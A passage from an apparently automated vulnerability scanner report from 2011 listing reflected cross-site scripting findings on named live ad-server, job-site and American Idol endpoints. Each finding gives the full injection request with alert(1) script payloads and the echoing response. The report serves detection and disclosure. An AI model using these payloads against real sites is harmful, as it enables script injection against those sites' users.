var skin_settings ={
   gutterWidth: 136,
   gutterHeight: 970,
   leftImage: '<img src="http://medrx.sensis.com.au/content/MeatAndLivestockAustralia/1
...[SNIP]...
<img src="http://medrx.sensis.com.au/content/MeatAndLivestockAustralia/118071/BEE0554_NRLSkin_R.jpg">',
   leftClick: "http://media.sensis.com.au/ADCLICK/CID=0003f79738cd0d3800000000712bb"-alert(1)-"696f09d19b0/acc_random=86235691049/SITE=3RD.NRL.SPORT/AAMSZ=4x1/AREA=SPORT.NRL.HOME/POSITION=BLW1/relocate=http://www.themainmeal.com.au/RecipesInspiration/Barbecue-recipes/Barbecue-recipes.htm",
   rightClick: "ht
...[SNIP]...

1.57. http://media.sensis.com.au/hserver/acc_random=86235691049/SITE=3RD.NRL.SPORT/AAMSZ=4x1/AREA=SPORT.NRL.HOME/POSITION=BLW1 [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://media.sensis.com.au
Path:	/hserver/acc_random=86235691049/SITE=3RD.NRL.SPORT/AAMSZ=4x1/AREA=SPORT.NRL.HOME/POSITION=BLW1

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fc670"-alert(1)-"bd04e5a903d was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /hserver/acc_randomfc670"-alert(1)-"bd04e5a903d=86235691049/SITE=3RD.NRL.SPORT/AAMSZ=4x1/AREA=SPORT.NRL.HOME/POSITION=BLW1 HTTP/1.1
Host: media.sensis.com.au
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.nrl.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: GUID=00038FE653150E8B59BFA3C561626364; LE4=RqrYE1+59N+31+5

Response

HTTP/1.1 200 OK
Server: Atlas-AdManager-DirectServer/10.3.7.2 (Red Hat Linux Enterprise 4; X86)
Date: Tue, 04 Oct 2011 20:16:18 GMT
X-DirectServer: DS4
Content-Type: text/html
Content-Length: 2040
Pragma: no-cache
Cache-control: no-cache
P3P: policyref="http://medrx.sensis.com.au/w3c/p3policy.xml", CP="NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa HISa OTPa OUR IND UNI COM NAV INT STA PRE LOC"
Connection: close

<script language="JavaScript" type="text/javascript">
var skin_settings ={
   gutterWidth: 136,
   gutterHeight: 970,
   leftImage: '<img src="http://medrx.sensis.com.au/content/MeatAndLivestockAustralia/1
...[SNIP]...
<img src="http://medrx.sensis.com.au/content/MeatAndLivestockAustralia/118071/BEE0554_NRLSkin_R.jpg">',
   leftClick: "http://media.sensis.com.au/ADCLICK/CID=0003f79738cd0d3800000000/acc_randomfc670"-alert(1)-"bd04e5a903d=86235691049/SITE=3RD.NRL.SPORT/AAMSZ=4x1/AREA=SPORT.NRL.HOME/POSITION=BLW1/relocate=http://www.themainmeal.com.au/RecipesInspiration/Barbecue-recipes/Barbecue-recipes.htm",
   rightClick: "http://media.
...[SNIP]...

1.58. http://media.sensis.com.au/hserver/acc_random=86235691049/SITE=3RD.NRL.SPORT/AAMSZ=4x1/AREA=SPORT.NRL.HOME/POSITION=BLW1 [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://media.sensis.com.au
Path:	/hserver/acc_random=86235691049/SITE=3RD.NRL.SPORT/AAMSZ=4x1/AREA=SPORT.NRL.HOME/POSITION=BLW1

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 75deb"-alert(1)-"ceb8cc61332 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /hserver/acc_random=86235691049/SITE=3RD.NRL.SPORT/AAMSZ=4x1/AREA=SPORT.NRL.HOME/POSITION=BLW1?75deb"-alert(1)-"ceb8cc61332=1 HTTP/1.1
Host: media.sensis.com.au
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.nrl.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: GUID=00038FE653150E8B59BFA3C561626364; LE4=RqrYE1+59N+31+5

Response

HTTP/1.1 200 OK
Server: Atlas-AdManager-DirectServer/10.3.7.2 (Red Hat Linux Enterprise 4; X86)
Date: Tue, 04 Oct 2011 20:16:08 GMT
X-DirectServer: DS4
Content-Type: text/html
Content-Length: 2057
Pragma: no-cache
Cache-control: no-cache
P3P: policyref="http://medrx.sensis.com.au/w3c/p3policy.xml", CP="NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa HISa OTPa OUR IND UNI COM NAV INT STA PRE LOC"
Connection: close

<script language="JavaScript" type="text/javascript">
var skin_settings ={
   gutterWidth: 136,
   gutterHeight: 970,
   leftImage: '<img src="http://medrx.sensis.com.au/content/MeatAndLivestockAustralia/1
...[SNIP]...
alia/118071/BEE0554_NRLSkin_R.jpg">',
   leftClick: "http://media.sensis.com.au/ADCLICK/CID=0003f79738cd0d3800000000/acc_random=86235691049/SITE=3RD.NRL.SPORT/AAMSZ=4x1/AREA=SPORT.NRL.HOME/POSITION=BLW1?75deb"-alert(1)-"ceb8cc61332=1&relocate=http://www.themainmeal.com.au/RecipesInspiration/Barbecue-recipes/Barbecue-recipes.htm",
   rightClick: "http://media.sensis.com.au/ADCLICK/CID=0003f79738cd0d3800000000/acc_random=86235691049
...[SNIP]...

1.59. http://media.sensis.com.au/hserver/acc_random=956894257036/SITE=3RD.BPPROMO.NRL.SPORT/AAMSZ=300x70/AREA=SPORT.NRL.HOME/POSITION=BLW1 [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://media.sensis.com.au
Path:	/hserver/acc_random=956894257036/SITE=3RD.BPPROMO.NRL.SPORT/AAMSZ=300x70/AREA=SPORT.NRL.HOME/POSITION=BLW1

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e5876"><script>alert(1)</script>87f35693f1d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /hservere5876"><script>alert(1)</script>87f35693f1d/acc_random=956894257036/SITE=3RD.BPPROMO.NRL.SPORT/AAMSZ=300x70/AREA=SPORT.NRL.HOME/POSITION=BLW1 HTTP/1.1
Host: media.sensis.com.au
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.nrl.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: GUID=00038FE653150E8B59BFA3C561626364; LE4=RqrYE1+59N+31+5; LE1=nUsYE1+4GlH+31+5

Response

HTTP/1.1 200 OK
Server: Atlas-AdManager-DirectServer/10.3.7.2 (Red Hat Linux Enterprise 4; X86)
Date: Tue, 04 Oct 2011 20:16:43 GMT
X-DirectServer: DS2
Content-Type: text/html
Content-Length: 365
Pragma: no-cache
Cache-control: no-cache
P3P: policyref="http://medrx.sensis.com.au/w3c/p3policy.xml", CP="NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa HISa OTPa OUR IND UNI COM NAV INT STA PRE LOC"
Connection: close

<a href="http://media.sensis.com.au/ADCLICK/CID=0003ea3f38cd0d3800000000e5876"><script>alert(1)</script>87f35693f1d/acc_random=956894257036/SITE=3RD.BPPROMO.NRL.SPORT/AAMSZ=300x70/AREA=SPORT.NRL.HOME/POSITION=BLW1" target="_new">
...[SNIP]...

1.60. http://media.sensis.com.au/hserver/acc_random=956894257036/SITE=3RD.BPPROMO.NRL.SPORT/AAMSZ=300x70/AREA=SPORT.NRL.HOME/POSITION=BLW1 [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://media.sensis.com.au
Path:	/hserver/acc_random=956894257036/SITE=3RD.BPPROMO.NRL.SPORT/AAMSZ=300x70/AREA=SPORT.NRL.HOME/POSITION=BLW1

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8f259"><script>alert(1)</script>4e431d63655 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /hserver/acc_random8f259"><script>alert(1)</script>4e431d63655=956894257036/SITE=3RD.BPPROMO.NRL.SPORT/AAMSZ=300x70/AREA=SPORT.NRL.HOME/POSITION=BLW1 HTTP/1.1
Host: media.sensis.com.au
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.nrl.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: GUID=00038FE653150E8B59BFA3C561626364; LE4=RqrYE1+59N+31+5; LE1=nUsYE1+4GlH+31+5

Response

HTTP/1.1 200 OK
Server: Atlas-AdManager-DirectServer/10.3.7.2 (Red Hat Linux Enterprise 4; X86)
Date: Tue, 04 Oct 2011 20:16:46 GMT
X-DirectServer: DS3
Content-Type: text/html
Content-Length: 362
Pragma: no-cache
Cache-control: no-cache
P3P: policyref="http://medrx.sensis.com.au/w3c/p3policy.xml", CP="NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa HISa OTPa OUR IND UNI COM NAV INT STA PRE LOC"
Connection: close

<a href="http://media.sensis.com.au/ADCLICK/CID=0003f40338cd0d3800000000/acc_random8f259"><script>alert(1)</script>4e431d63655=956894257036/SITE=3RD.BPPROMO.NRL.SPORT/AAMSZ=300x70/AREA=SPORT.NRL.HOME/POSITION=BLW1" target="_new">
...[SNIP]...

1.61. http://media.sensis.com.au/hserver/acc_random=956894257036/SITE=3RD.BPPROMO.NRL.SPORT/AAMSZ=300x70/AREA=SPORT.NRL.HOME/POSITION=BLW1 [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://media.sensis.com.au
Path:	/hserver/acc_random=956894257036/SITE=3RD.BPPROMO.NRL.SPORT/AAMSZ=300x70/AREA=SPORT.NRL.HOME/POSITION=BLW1

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 303c3"><script>alert(1)</script>c0139512324 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /hserver/acc_random=956894257036/SITE=3RD.BPPROMO.NRL.SPORT/AAMSZ=300x70/AREA=SPORT.NRL.HOME/POSITION=BLW1?303c3"><script>alert(1)</script>c0139512324=1 HTTP/1.1
Host: media.sensis.com.au
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.nrl.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: GUID=00038FE653150E8B59BFA3C561626364; LE4=RqrYE1+59N+31+5; LE1=nUsYE1+4GlH+31+5

Response

HTTP/1.1 200 OK
Server: Atlas-AdManager-DirectServer/10.3.7.2 (Red Hat Linux Enterprise 4; X86)
Date: Tue, 04 Oct 2011 20:16:38 GMT
X-DirectServer: DS3
Content-Type: text/html
Content-Length: 365
Pragma: no-cache
Cache-control: no-cache
P3P: policyref="http://medrx.sensis.com.au/w3c/p3policy.xml", CP="NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa HISa OTPa OUR IND UNI COM NAV INT STA PRE LOC"
Connection: close

<a href="http://media.sensis.com.au/ADCLICK/CID=0003f40338cd0d3800000000/acc_random=956894257036/SITE=3RD.BPPROMO.NRL.SPORT/AAMSZ=300x70/AREA=SPORT.NRL.HOME/POSITION=BLW1?303c3"><script>alert(1)</script>c0139512324=1" target="_new">
...[SNIP]...

1.62. http://my.careerone.com.au/services/adservices/getcommonadurl.ashx [applicationid parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://my.careerone.com.au
Path:	/services/adservices/getcommonadurl.ashx

Issue detail

The value of the applicationid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9e520"%3balert(1)//60325d708b3 was submitted in the applicationid parameter. This input was echoed as 9e520";alert(1)//60325d708b3 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /services/adservices/getcommonadurl.ashx?applicationid=www9e520"%3balert(1)//60325d708b3&path=homepage HTTP/1.1
Host: my.careerone.com.au
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.careerone.com.au/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: split_scsjsv=26; WT_FPC=id=10.5.199.242-3607297344.30180036:lv=1317810158620:ss=1317810158620

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/plain; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
P3P: CP=CAO DSP COR CURa ADMa DEVa TAIa IVAa IVDa CONo HISa TELo PSAa PSDa DELa UNRa PUBi OTRa BUS LEG PHY ONL UNI PUR COM NAV INT DEM CNT STA HEA PRE GOV OTC
Date: Tue, 04 Oct 2011 20:07:32 GMT
Content-Length: 174

_s.ads.jsAdController.setAdSource("http://ads.monster.com/html.ng/site=auen&affiliate=auen&app=www9e520";alert(1)//60325d708b3&size=0x0&path=homepage&tile=ed68aeacfb0e4cec");

1.63. http://my.careerone.com.au/services/adservices/getcommonadurl.ashx [path parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://my.careerone.com.au
Path:	/services/adservices/getcommonadurl.ashx

Issue detail

The value of the path request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5c5d5"%3balert(1)//83ab68a2ab0 was submitted in the path parameter. This input was echoed as 5c5d5";alert(1)//83ab68a2ab0 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /services/adservices/getcommonadurl.ashx?applicationid=www&path=homepage5c5d5"%3balert(1)//83ab68a2ab0 HTTP/1.1
Host: my.careerone.com.au
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.careerone.com.au/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: split_scsjsv=26; WT_FPC=id=10.5.199.242-3607297344.30180036:lv=1317810158620:ss=1317810158620

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/plain; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
P3P: CP=CAO DSP COR CURa ADMa DEVa TAIa IVAa IVDa CONo HISa TELo PSAa PSDa DELa UNRa PUBi OTRa BUS LEG PHY ONL UNI PUR COM NAV INT DEM CNT STA HEA PRE GOV OTC
Date: Tue, 04 Oct 2011 20:07:46 GMT
Content-Length: 174

_s.ads.jsAdController.setAdSource("http://ads.monster.com/html.ng/site=auen&affiliate=auen&app=www&size=0x0&path=homepage5c5d5";alert(1)//83ab68a2ab0&tile=09446f654f884dc2");

1.64. http://myidol.americanidol.com/ie7-styles.css [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://myidol.americanidol.com
Path:	/ie7-styles.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload b5314'><script>alert(1)</script>7a8b247438e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /ie7-styles.cssb5314'><script>alert(1)</script>7a8b247438e?ver=1236 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3)
Proxy-Connection: Keep-Alive
Host: myidol.americanidol.com

Response (redirected)

HTTP/1.1 200 OK
Server: Apache
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Expires: Tue, 04 Oct 2011 21:32:10 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 04 Oct 2011 21:32:10 GMT
Content-Length: 1325
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><title>Whoops! Browser Settin
...[SNIP]...
<a href='http://myidol.americanidol.com/ie7-styles.cssb5314'><script>alert(1)</script>7a8b247438e?ver=1236'>
...[SNIP]...

1.65. http://myidol.americanidol.com/images/css/newforum.css [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://myidol.americanidol.com
Path:	/images/css/newforum.css

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 1227c'><script>alert(1)</script>7251447615 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /images/css/newforum.css1227c'><script>alert(1)</script>7251447615?ver=1010 HTTP/1.1
Host: myidol.americanidol.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/css,*/*;q=0.1
Referer: http://widgets.myidol.americanidol.com/tools/keyslave.one?url=aHR0cDovL3dpZGdldHMubXlpZG9sLmFtZXJpY2FuaWRvbC5jb20vcmVkaXJlY3Qub25lP3JlZGlyZWN0X3RvPWh0dHA6Ly93d3cuYW1lcmljYW5pZG9sLmNvbS8.%2527&core_u=faa976043c793de66165b83afd81de19&core_x=3e3d8fc3a1227dd8404b22789c1bc64d&ts=1317758762
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2745A99E051D1536-4000010A2004AB28[CE]; __utma=124250778.1498354944.1317753547.1317756115.1317758789.3; __utmz=124250778.1317758789.3.3.utmcsr=newscorp.com|utmccn=(referral)|utmcmd=referral|utmcct=/operations/other.html; s_pers=%20s_vnum%3D1320123600884%2526vn%253D3%7C1320123600884%3B%20s_invisit%3Dtrue%7C1317760745107%3B%20s_dayslastvisit%3D1317758945123%7C1412366945123%3B%20s_dayslastvisit_s%3DLess%2520than%25201%2520day%7C1317760745123%3B

Response (redirected)

HTTP/1.1 200 OK
Server: Apache
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Expires: Tue, 04 Oct 2011 21:23:19 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 04 Oct 2011 21:23:19 GMT
Content-Length: 1333
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><title>Whoops! Browser Settin
...[SNIP]...
<a href='http://myidol.americanidol.com/images/css/newforum.css1227c'><script>alert(1)</script>7251447615?ver=1010'>
...[SNIP]...

1.66. http://myidol.americanidol.com/images/webfontkit/helveticaneuew02-75bold-webfont.woff [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://myidol.americanidol.com
Path:	/images/webfontkit/helveticaneuew02-75bold-webfont.woff

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload acb1a'><script>alert(1)</script>9093560950c was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /images/webfontkit/helveticaneuew02-75bold-webfont.woffacb1a'><script>alert(1)</script>9093560950c HTTP/1.1
Host: myidol.americanidol.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://widgets.myidol.americanidol.com/tools/keyslave.one?url=aHR0cDovL3dpZGdldHMubXlpZG9sLmFtZXJpY2FuaWRvbC5jb20vcmVkaXJlY3Qub25lP3JlZGlyZWN0X3RvPWh0dHA6Ly93d3cuYW1lcmljYW5pZG9sLmNvbS8.%2527&core_u=faa976043c793de66165b83afd81de19&core_x=3e3d8fc3a1227dd8404b22789c1bc64d&ts=1317758762
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2745A99E051D1536-4000010A2004AB28[CE]; __utma=124250778.1498354944.1317753547.1317756115.1317758789.3; __utmz=124250778.1317758789.3.3.utmcsr=newscorp.com|utmccn=(referral)|utmcmd=referral|utmcct=/operations/other.html; s_pers=%20s_v18_stack%3D%255B%255B'D%25253Dc18'%252C'1317763429285'%255D%255D%7C1475616229285%3B%20s_vnum%3D1320123600884%2526vn%253D4%7C1320123600884%3B%20s_invisit%3Dtrue%7C1317765229287%3B%20s_dayslastvisit%3D1317763429291%7C1412371429291%3B%20s_dayslastvisit_s%3DLess%2520than%25201%2520day%7C1317765229291%3B; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20c_m%3Dundefinedburpburp%3B%20s_sq%3D%3B

Response (redirected)

HTTP/1.1 200 OK
Server: Apache
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Expires: Tue, 04 Oct 2011 21:23:29 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 04 Oct 2011 21:23:29 GMT
Content-Length: 1356
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><title>Whoops! Browser Settin
...[SNIP]...
<a href='http://myidol.americanidol.com/images/webfontkit/helveticaneuew02-75bold-webfont.woffacb1a'><script>alert(1)</script>9093560950c'>
...[SNIP]...

1.67. http://myidol.americanidol.com/png_fix.css [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://myidol.americanidol.com
Path:	/png_fix.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 6b3dd'><script>alert(1)</script>ad5d2697bb was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /png_fix.css6b3dd'><script>alert(1)</script>ad5d2697bb?ver=1 HTTP/1.1
Host: myidol.americanidol.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/css,*/*;q=0.1
Referer: http://widgets.myidol.americanidol.com/tools/keyslave.one?url=aHR0cDovL3dpZGdldHMubXlpZG9sLmFtZXJpY2FuaWRvbC5jb20vcmVkaXJlY3Qub25lP3JlZGlyZWN0X3RvPWh0dHA6Ly93d3cuYW1lcmljYW5pZG9sLmNvbS8.%2527&core_u=faa976043c793de66165b83afd81de19&core_x=3e3d8fc3a1227dd8404b22789c1bc64d&ts=1317758762
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2745A99E051D1536-4000010A2004AB28[CE]; __utma=124250778.1498354944.1317753547.1317756115.1317758789.3; __utmz=124250778.1317758789.3.3.utmcsr=newscorp.com|utmccn=(referral)|utmcmd=referral|utmcct=/operations/other.html; s_pers=%20s_vnum%3D1320123600884%2526vn%253D3%7C1320123600884%3B%20s_invisit%3Dtrue%7C1317760745107%3B%20s_dayslastvisit%3D1317758945123%7C1412366945123%3B%20s_dayslastvisit_s%3DLess%2520than%25201%2520day%7C1317760745123%3B

Response (redirected)

HTTP/1.1 200 OK
Server: Apache
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Expires: Tue, 04 Oct 2011 21:23:14 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 04 Oct 2011 21:23:14 GMT
Content-Length: 1318
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><title>Whoops! Browser Settin
...[SNIP]...
<a href='http://myidol.americanidol.com/png_fix.css6b3dd'><script>alert(1)</script>ad5d2697bb?ver=1'>
...[SNIP]...

1.68. http://myidol.americanidol.com/tiny-edit.css [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://myidol.americanidol.com
Path:	/tiny-edit.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload fea64'><script>alert(1)</script>d9bb724dfee was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /tiny-edit.cssfea64'><script>alert(1)</script>d9bb724dfee?ver=1 HTTP/1.1
Host: myidol.americanidol.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/css,*/*;q=0.1
Referer: http://widgets.myidol.americanidol.com/tools/keyslave.one?url=aHR0cDovL3dpZGdldHMubXlpZG9sLmFtZXJpY2FuaWRvbC5jb20vcmVkaXJlY3Qub25lP3JlZGlyZWN0X3RvPWh0dHA6Ly93d3cuYW1lcmljYW5pZG9sLmNvbS8.%2527&core_u=faa976043c793de66165b83afd81de19&core_x=3e3d8fc3a1227dd8404b22789c1bc64d&ts=1317758762
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2745A99E051D1536-4000010A2004AB28[CE]; __utma=124250778.1498354944.1317753547.1317756115.1317758789.3; __utmz=124250778.1317758789.3.3.utmcsr=newscorp.com|utmccn=(referral)|utmcmd=referral|utmcct=/operations/other.html; s_pers=%20s_vnum%3D1320123600884%2526vn%253D3%7C1320123600884%3B%20s_invisit%3Dtrue%7C1317760745107%3B%20s_dayslastvisit%3D1317758945123%7C1412366945123%3B%20s_dayslastvisit_s%3DLess%2520than%25201%2520day%7C1317760745123%3B

Response (redirected)

HTTP/1.1 200 OK
Server: Apache
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
